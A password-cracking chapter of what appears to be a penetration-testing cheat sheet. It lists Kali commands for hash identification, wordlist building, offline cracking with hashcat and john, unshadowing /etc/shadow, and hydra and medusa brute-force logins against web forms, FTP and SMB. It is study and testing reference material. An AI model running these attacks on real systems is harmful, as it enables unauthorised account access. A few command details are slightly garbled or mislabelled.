Chapter 7 - Cracking

The time to crack a password is related to bit strength, which is a measure of the password's entropy and the details of how the password is stored. Most methods of password cracking require the computer to produce many candidate passwords, each of which is checked. One example is brute-force cracking, in which a computer tries every possible key or password until it succeeds. More common methods of password cracking, such as dictionary attacks, pattern checking, word list substitution, etc. attempt to reduce the number of trials required and will usually be attempted before brute force. Higher password bit strength exponentially increases the number of candidate passwords that must be checked, on average, to recover the password and reduces the likelihood that the password will be found in any cracking dictionary.

— Wikipedia

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Hash Identification

Kali> hash-identifier


Kali> echo"BASE64"| base64 -d
Kali> echo"d3 4d b3 3f"| xxd -r -ps

Wordlist Generation


Kali> crunch 6 6 0123456789ABCDEF -o crunch.txt


Kali> cewl -m 6 -w passwords.txt


Kali> nano /etc/john/john.conf
Kali> john --wordlist=passwords.txt --rules --stdout > mutated



Kali> hashcat -m 400 -a 0 hash /usr/share/wordlists/rockyou.txt
Kali> oclHashcat64.bin -m 110 hash.txt ../wordlist.txt --force

Hashcat man page & hash types

Converting for John attacks

Kali> ssh2john file > newfile
Kali> unshadow /etc/passwd /etc/shadow > unshadowed.txt


Kali> john crackfile --wordlist=/usr/share/wordlists/rockyou.txt

John Hash Types



Kali> hydra -l admin -P /usr/share/wordlists/rockyou.txt $TARGET http-post-form "/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password" -V -I

Kali> hydra -L /path/to/file/usernames.txt -P /path/to/file/passwords.txt $TARGET ftp

Kali>hydra -l administrator -P /path/to/file/passwords.txt -t 1 $TARGET smb
    -t 1 = number of times to try


Kali> medusa -h $TARGET -u admin -P passwords.txt -M http -m DIR:/admin -T 10

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